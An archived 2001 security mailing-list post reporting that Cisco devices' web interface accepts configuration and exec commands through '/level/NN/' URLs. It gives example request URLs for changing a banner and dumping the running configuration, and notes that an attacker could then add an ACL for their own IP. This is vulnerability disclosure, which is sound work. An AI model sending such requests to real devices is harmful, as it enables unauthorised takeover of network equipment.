OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Half Adder (dpsLib-Vai.lib.asu.edu)
Date: Mon Jul 02 2001 - 15:56:37 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    You can also run configuration commands. :)

    http://169.254.0.15/level/42/configure/-/banner/motd/LINE, etc.

    Start with http://169.254.0.16/level/xx/configure and go from there.

    A malicious user could use:

    http://169.254.0.15/level/42/exec/show%20conf

    to get, for instance, vty 0 4 acl information and then add an ACL for
    his/her source ip.

    I tested creating a banner. I assume other configure commands will work
    as well. This was tested on a Cisco switch. Anyone?